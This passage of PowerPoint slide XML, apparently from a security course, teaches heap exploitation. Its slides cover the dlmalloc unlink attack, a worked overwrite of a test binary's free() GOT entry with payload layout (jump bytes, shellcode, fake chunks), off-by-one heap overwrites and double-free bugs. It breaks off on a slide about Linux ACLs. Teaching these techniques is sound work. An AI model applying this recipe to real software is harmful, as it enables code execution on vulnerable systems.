        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="18288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62" name="AutoShape 22"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="2514600"/>
            <a:ext cx="76200" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 341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63" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="64770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64" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="64770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5465" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="64770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66" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="64770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67" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="64770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5469" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="47244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5470" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="2857500"/>
            <a:ext cx="788873"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W</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085471" name="AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="62484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72" name="AutoShape 32"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="25146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73" name="Rectangle 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2914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fd_w</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085474" name="Rectangle 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="31432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bk_w</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085475" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="33718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of W</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085476" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3600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5477" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3829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fd_z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085478" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="4057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bk_z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085479" name="AutoShape 39"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="34290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80" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724401" y="3657600"/>
            <a:ext cx="742962" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk Z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344312390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6467" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1314450"/>
            <a:ext cx="4267200" cy="3486150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>free(X) is called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>W is examined and Z is found using (W + W-&gt;size)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Z says that W is free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>unlink(W, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>fd_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bk_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) is called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fd_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + 12) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bk_w</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>*(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bk_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> + 8) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>fd_w</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>fd_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> is set to the address to be overwritten - 12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bk_w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> is set to the value to be written</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086469" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="64770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6470" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="64770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6471" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="64770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6472" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="64770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6473" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="64770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6474" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="47244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6475" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="2857500"/>
            <a:ext cx="788873"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W</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086476" name="AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="62484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77" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="25146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78" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2914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fd_w</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086479" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="31432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bk_w</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086480" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="33718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of W</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086481" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3600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6482" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3829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fd_z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086483" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="4057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bk_z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086484" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="34290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85" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724401" y="3657600"/>
            <a:ext cx="742962"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Z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281002356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8515" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwrite the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>free()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> GOT entry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -R ./test | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> free</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>08049924 R_386_JUMP_SLOT   free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x08049924 - 0x0c = 0x8049918</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First 8 bytes of the data portion of X will be overwritten by unlink() with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Following two bytes are jump forward of 12 bytes (0xeb 0x0c)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Following 12 bytes are modified by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and padding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then fake chunk with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0x8049918 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = X + 8 (address of the jump instruction)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second fake chunk with PREV_INUSE=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305649972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Off-by-one Heap Overwrite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conditions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is an off-by-one overflow that affects a heap buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The overflowing byte is 0x00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are three buffer involved (A, B, C) and the address of the overwritten buffer in the middle has a non-null least significant byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By overwriting the least significant byte, the size of the middle chunk B is modified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the middle chunk is freed, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>prev_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of C is not updated because the update falls in the wrong place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63530919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Off-by-one Heap Overwrite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now two new chunks B1 and B2 are allocated and B1 is freed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When C is also freed, since its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>prev_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has not be updated, it will think that B1 is as big as the original B and will combine in a free space B1, B2, and C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The next allocation will overlap with B2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker controls this buffer and therefore can modify B2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When B2 is used by the application it will use attacker controlled data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.contextis.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/documents/120/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Glibc_Adventures-The_Forgotten_Chunks.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46608105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a:t>Double free() Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1148931" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a programmer makes the mistake of freeing a pointer that was already freed, in some cases it is possible to execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A memory block X is allocated (size = N)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>free(X) is invoked and consolidated with an adjacent block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A new block Y is allocated in the consolidated space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dlmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tries to use recently freed memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Y is filled with attacker-provided data, which creates a fake block starting at address X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>free(X) is called again and the unlink() macro is called because of the consolidation and memory is overwritten as in the case for the standard heap overflow attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201270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E455-4B44-FE40-9DCF-66E9DA970791}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extended Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66FD0E8D-328F-FEAF-71ED-F4147C055EA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access Control Lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arbitrary access control configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ACLs are set/read with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setfacl</a:t>
            </a:r>
            <a:r>
